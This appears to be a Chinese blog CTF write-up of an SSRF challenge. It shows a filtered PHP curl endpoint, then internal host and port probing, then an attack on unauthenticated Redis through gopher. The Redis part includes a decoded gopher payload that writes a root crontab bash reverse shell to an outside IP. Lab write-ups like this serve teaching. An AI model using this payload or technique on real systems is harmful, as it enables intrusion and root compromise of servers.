SSRF漏洞(服务器端请求伪造)相关案例

最新推荐文章于 2025-06-03 21:59:24 发布
最新推荐文章于 2025-06-03 21:59:24 发布
阅读量1.3k 收藏 12
点赞数 9
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: 安全 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/AXDRXS/article/details/141610268

目录

前言:

案例:Web-ssrfme

一、redis未授权访问攻击

1.1 进入题目给出源码

1.2 测试ssrf

1.3 查看phpinfo发现主机

1.4 发现服务

1.5 攻击访问

1.6 FLAG

二、redis未授权写入任务计划

2.1 探测开放端口

2.2 导入任务计划

2.3 反弹shell成功

前言:

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统。SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。

案例:Web-ssrfme

一、redis未授权访问攻击

1.1 进入题目给出源码

<?php
highlight_file(__file__);
function curl($url){  
   $ch = curl_init();
   curl_setopt($ch, CURLOPT_URL, $url);
   curl_setopt($ch, CURLOPT_HEADER, 0);
   echo curl_exec($ch);
   curl_close($ch);
}
 
if(isset($_GET['url'])){
   $url = $_GET['url'];
 
   if(preg_match('/file\:\/\/|dict\:\/\/|\.\.\/|127.0.0.1|localhost/is', $url,$match))
  {
       die('No, No, No!');
  }
   curl($url);
}
if(isset($_GET['info'])){
   phpinfo();
}
?>

1.2 测试ssrf

但是源码过滤了file协议、dict协议、127.0.0.1和localhost,但没有过滤http协议和gopher协议我们使用http协议进行内网主机存活探测。目前还不知道当前主机的内网ip,但是源码提供了一个查看phpinfo的功能。

1.3 查看phpinfo发现主机

然后我们便可以探测该网段上存活的主机了(可以用burp,但这里手动测试即可)

/search?url=http://172.17.0.1  # 无存活
/search?url=http://172.17.0.2   # 发现另一存活机器
/search?url=http://172.17.0.3   # 当前机器

172.17.0.1是一台apache服务器:

172.17.0.3中是我们自己的本机:

然后我们在172.17.0.2中发现了存活主机:

说明172.17.0.2是内网中存活的另一台主机,并且上面也运行着http服务。

1.4 发现服务

当前还不能找到攻下这台内网主机的突破口,我们可以使用ssrf扫描一下这个内网主机的端口,这里使用burpsuite:

我们用bp里面的intruder模块扫描

然后我们发现6379进行开放。

1.5 攻击访问

由于这台内网主机上还存在一个http服务,所以我们可以将webshell写入其web目录,然后用ssrf进行访问。但是我们尝试发现不能直接在/var/www/html目录下写文件,我们使用burp扫一下都有哪些目录,发现有个upload目录。

然后我们在环境中查看是否存在,发现确实存在这个目录:

我们可以使用我们的一个工具进行渗透,这个工具叫Gopherusr在github上面是开源的,他主要用到的是gopher协议。

  • gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。在WWW出现之前,GopherInternet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。

  • 它只支持文本,不支持图像

  • 我们现在最多看到使用这个协议的时候都是在去ssrfredis shell、读mysql数据。

1.6 FLAG

二、redis未授权写入任务计划

未授权写入项目计划书项目地址

2.1 探测开放端口

可以手动探测也可以用万能的bp,打久了经常用的端口就那几个,6379开放。

2.2 导入任务计划

在根目录下面有一个利用工具,进去后可以看到一堆编码,而我们可以通过解码看这个任务计划在做什么:

gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$75
 
 
*/1 * * * * /bin/bash -c 'sh -i >& /dev/tcp/192.168.201.142/12345 0>&1'
 
 
*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
*1
$4
quit

2.3 反弹shell成功

root用户的原因:因为在redis低版本中它没有降权,所以执行的时候使用是root。

SSRF漏洞内网渗透利用(实例)
墨痕诉清风的博客
10-07 6642
目录 常出现的位置 绕过方式 正则过滤指定网址 内网IP地址绕过(不容许172、10、192开头的地址均不许输入) 常见的攻击协议 实例:ssrf漏洞利用(内网探测、打redis) 一、进行内网探测 二、file协议读取文件 三、攻击redis 方法一:通过header CRLF 注入 方法二:通过【curl命令】和【gopher协议】远程攻击内网redis 方法三:使用dict协议向Redis数据库写shell Payload 完善修改 四、结合gopher协...
「 典型安全漏洞系列 」04.服务器端请求伪造SSRF详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-16 2253
实验室环境为支持库存检查功能的购物网站,存在SSRF漏洞,可以利用漏洞来使用管理员权限删除普通用户。。
SSRF漏洞实例分析
kali_Ma的博客
10-12 718
0x00 漏洞信息简介 Crossday Discuz! Board(简称 Discuz!)是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。自2001年6月面世以来,Discuz!已拥有15年以上的应用历史和200多万网站用户案例,是全球成熟度最高、覆盖率最大的论坛软件系统之一。目前最新版本Discuz! X3.4正式版于2017年8月2日发布,去除了云平台的相关代码,是 X3.2 的稳定版本。此次漏洞位于/source/module/misc/misc_imgcropper.php中的.
SSRF攻击实例讲解
白帽子凯哥聊黑客
12-14 1457
服务器端请求伪造SSRF)攻击是一种网络安全漏洞,其中攻击者迫使受影响的服务器向攻击者指定的内部或外部系统发送请求。以下是一个SSRF攻击的实例讲解及其分析。
CSRF&SSRF漏洞
最新发布
2501_91578299的博客
06-03 1500
网络安全的广袤领域中,CSRF 与 SSRF 漏洞犹如隐藏在暗处的 “网络刺客”,悄无声息地威胁着用户数据安全与系统稳定。对于刚踏入网安大门的新手小白而言,这两大漏洞的原理与防护知识既是亟需攻克的难关,也是开启网络安全技术探索之旅的重要钥匙。为帮助大家快速入门,本文精心梳理出全网最全面的 CSRF、SSRF 漏洞讲解与实战演练,以通俗易懂的语言和详细步骤,带您揭开网络安全攻防的神秘面纱,筑牢网络安全的认知基石。
实战 | SSRF攻击内网的实战案例
weixin_43167326的博客
02-03 1261
推荐查看: 实战 | 记一次SSRF攻击内网的实战案例 实战 | 记两次应急响应小记 干货 | Wordpress网站渗透方法指南 实战 | 记一次CTF题引发的0day挖掘 2023年零基础+进阶系统化白帽黑客学习 实战 | 记一次邮件系统C段引发的SQL手注和内网渗透
ssrf漏洞原理和案例演示
qq_44720671的博客
06-03 547
ssrf漏洞原理和案例演示 一、定义 SSRF(Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据 数据流:攻击者----->服务器---->目标地址 根据后台使用的函数的不同...
web漏洞挖掘指南 -SSRF服务器端请求伪造
weixin_40418457的博客
10-11 486
一、漏洞原理及触发场景 web服务器经常需要从别的服务器获取数据,比如文件载入、图片拉取、图片识别等功能,如果获取数据的服务器地址可控,攻击者就可以通过web服务器自定义向别的服务器发出请求。因为web服务器常搭建在DMZ区域,因此常被攻击者当作跳板,向内网服务器发出请求。 常见的ssrf漏洞场景(所有需要输入url的地方都可以尝试ssrf,将url改成dnslog地址,验证请求IP是否来自web服务器): 远程图片拉取 xls,doc等文件预览 头像加载 其他网站的访问截图 ssrf常用的协议:
SSRF漏洞原理与案例分析
weixin_46492701的博客
06-24 1088
SSRF (Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造请求,由服务端发起请求安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统。
OWASP Zap中的SSRF服务器端请求伪造测试
它提供了一个简单易用的界面,用于帮助开发人员和安全测试人员发现并利用网页应用程序中的各种漏洞,包括但不限于跨站点脚本(XSS)、SQL 注入、SSRF 等。 ## 1.2 OWASP Zap的作用和特点 OWASP Zap可以帮助用户...
SSRF漏洞
zy010101博客
10-09 1332
服务器端请求伪造(Server-Side Request Forgery, SSRF)是一种由攻击者控制服务器发送恶意请求安全漏洞。攻击者可以利用 SSRF 在受害服务器内部发起网络请求,进而访问未授权的资源或服务。
29 WEB漏洞-CSRF及SSRF漏洞案例讲解-附件资源
03-05
29 WEB漏洞-CSRF及SSRF漏洞案例讲解-附件资源
SSRF漏洞实现
dragon的博客
08-25 1177
其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。
SSRF漏洞原理和案例演示
weixin_44749329的博客
06-03 1063
SSRF漏洞原理和案例演示 SSRF:其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制导致攻击者可以传入注意的地址让后端服务器对其发起请求,并返回对该目标地址请求数据 数据流:攻击者---->服务器---->目标地址 根据后台的函数的不同,对其应用的影响和利用方法又有不一样 PHP中下面函数的使用不当会导致SSRF: file_get...
SSRF攻击实例解析
Jack001011的博客
08-06 630
[安全科普]SSRF攻击实例解析 ssrf攻击概述 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。这种形式的攻击称为服务端请求伪造攻击(Server-side Request Forgery)。 比如下图显示的就是提供这种功能的典型应用: [ssrf1.png] 如果应用程序对用户提供的URL和远端服务器返回的信息没有进行合适的验证和过滤,就可能
CSRF和SSRF漏洞案例讲解
weixin_46739058的博客
04-09 3508
CSRF的概念 CSRF:跨站请求伪造(Cross-site request forgery)CSRF是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。当用户访问含有恶意代码的网页时,会向指定正常网站发送非本人意愿的数据请求包(如转账给hack,向hack发送API等)如果此时用户恰好登录了该正常网站(也就是身份验证是正常的)就会执行该恶意代码的请求,从而造成CSRF。 与在XSS章节中提到的在博客里写入获取cookie的代码,在管理员登录后台查看时就会窃取其cookie有异曲..
SSRF,以weblogic为案例
weixin_45694388的博客
10-19 1618
复习一下ssrf的原理及危害,并且以weblog的ssrf漏洞案例 漏洞原理 SSRF(Server-side Request Forge, 服务端请求伪造) 通常用于控制web进而探测内网服务以及攻击内网脆弱应用 即当作跳板机,可作为ssrfsocks代理 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。SSRF 形成的原因大都是由于服务端提供了从其他服务
ssrf漏洞利用+CTF实例
hyq99999的博客
09-08 1674
ssrf漏洞,redis未授权访问
Pikachu Linux安装包教程与服务器端请求伪造资料
文档的名称为'kali-2203-Cwillchris-SSRF 服务器端请求伪造.docx',它详细说明了SSRF的概念、危害以及如何使用pikachu进行SSRF漏洞的探测和利用。pikachu-master文件夹中则包含了实际的工具文件和脚本,供用户进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Smiling Mr. Rui

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值